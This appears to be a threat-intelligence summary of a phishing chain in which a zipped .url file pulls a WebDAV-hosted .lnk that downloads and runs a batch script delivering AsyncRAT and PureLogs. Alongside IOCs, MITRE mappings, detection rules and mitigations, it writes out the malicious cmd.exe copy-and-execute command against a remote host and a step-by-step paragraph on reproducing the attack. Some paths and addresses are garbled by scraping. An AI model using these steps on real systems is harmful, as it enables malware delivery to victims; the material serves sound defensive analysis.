Keypoints
- Attack chain: phishing -> zipped URL file (.url) -> WebDAV-hosted .lnk -> .bat download -> malware (AsyncRAT, PureLogs).
- Offensive steps: create .lnk that runs cmd.exe to copy and execute a .bat from a WebDAV server, host files with WsgiDAV on a chosen port (e.g., 3001).
- Observed artifacts: URL file content with “URL=file://”, WebDAV path containing DavWWWRoot, on-disk temporary LNKs in Tfs_DAV, and command-lines referencing remote host@port.
- Detection signatures provided: YARA rules for URL and LNK detection, a SIGMA rule to catch cmd.exe command-line patterns, and Suricata signatures for LNK downloads.
- IOC examples include the remote IP:port used in examples (101.99.94.234:9809), DavWWWRoot directory references, and payload filenames saved to %USERPROFILE%Pictures.
- Mitigation: block execution of .url files in Windows and monitor for command lines containing remote-host patterns (e.g., “*@*”).
MITRE Techniques
- [T1204.001] Malicious Link – Attack used an Internet Shortcut (.url) that points to a WebDAV resource to trigger downstream payload retrieval (‘[InternetShortcut]’ and ‘URL=file://’).
- [T1204.002] Malicious File – A .lnk shortcut placed on disk contains a command to copy and execute a .bat from the remote server (‘C:WindowsSystem32cmd.exe /c copy “101.99[.][email protected]” “%USERPROFILE%Picturesfile.bat” && “%USERPROFILE%Picturesfile.bat”’).
- [T1105] Ingress Tool Transfer – Remote transfer of the .lnk and .bat payloads from the WebDAV server to the victim host (‘LNK file download logs from WebDav server’).
- [T1059.003] Command and Scripting Interpreter: Windows cmd – cmd.exe is invoked to copy and run the batch payload on the host (‘cmd.exe /c copy … && …’).
- [T1071.001] Application Layer Protocol: Web Protocols – WebDAV (HTTP-based) is used as the transport for hosting and retrieving malicious artifacts (‘WebDAV server has started on port 3001’ and ‘DavWWWRoot’).
Indicators of Compromise
- [IP Address] remote WebDAV server – 101.99.94.234:9809 (seen in .lnk command line), and other attack server addresses referenced in network logs.
- [Domain] phishing host used to host URL file – TryCloudFlare (phishing domain observed in the malicious URL file).
- [File Path / Directory] temporary and target locations – Tfs_DAV (temp directory where .lnk is saved), %USERPROFILE%Picturesfile.bat (destination and execution path).
- [File Name / Extension] shortcut and payload filenames – randomly-named .lnk (GUID-style name created on disk), file.bat (downloaded batch script).
- [URL / Protocol] WebDAV path patterns – presence of ‘DavWWWRoot’ and ‘file.lnk’ in URLs (e.g., file://101.99.94.234@9809/DavWWWRoot/file.lnk).
To reproduce the attack and analyze detection points: set up a WebDAV server (WsgiDAV) on an attacker host and place a malicious .lnk there that invokes cmd.exe to copy a .bat from the WebDAV path into a user-writable directory and execute it. Deliver an Internet Shortcut (.url) to a victim (commonly via a ZIP/Dropbox-phishing attachment); when the user opens the .url, Windows resolves the file:// WebDAV link, causing a LNK file to be saved under a temporary Tfs_DAV directory and then executed. The LNK typically contains a command like: C:WindowsSystem32cmd.exe /c copy “[email protected]” “%USERPROFILE%Picturesfile.bat” && “%USERPROFILE%Picturesfile.bat”, which downloads and runs the BAT payload that retrieves malware such as AsyncRAT and PureLogs.
Detection can be implemented at multiple layers: file-hunting rules (YARA) to match .url content (look for ‘[InternetShortcut]’ and ‘URL=file://’) and on-disk .lnk patterns (binary header + IP@port/WebDAV regex), process creation monitoring (SIGMA) to catch cmd.exe command lines containing remote-host patterns like ‘.+@.+’, and network IDS (Suricata) signatures to flag LNK or .bat downloads over HTTP/WebDAV. Example signatures in the article include a YARA for URL files, a YARA for LNK files with WebDAV IP patterns, a SIGMA rule detecting CommandLine regex “.+@.+”, and Suricata rules for “LNK File Downloaded via HTTP”.
Mitigation recommendations: prevent user execution of .url files through Windows policy controls, monitor and block WebDAV-hosted file retrievals from untrusted hosts, and hunt for the specific artifacts described (Tfs_DAV temporary LNK creation, cmd.exe invocations with remote-host@port patterns, and DavWWWRoot occurrences in logs). Combine endpoint file detection, process creation telemetry, and network IDS alerts to cover the full chain.
Read more: https://any.run/cybersecurity-blog/client-side-exploitation/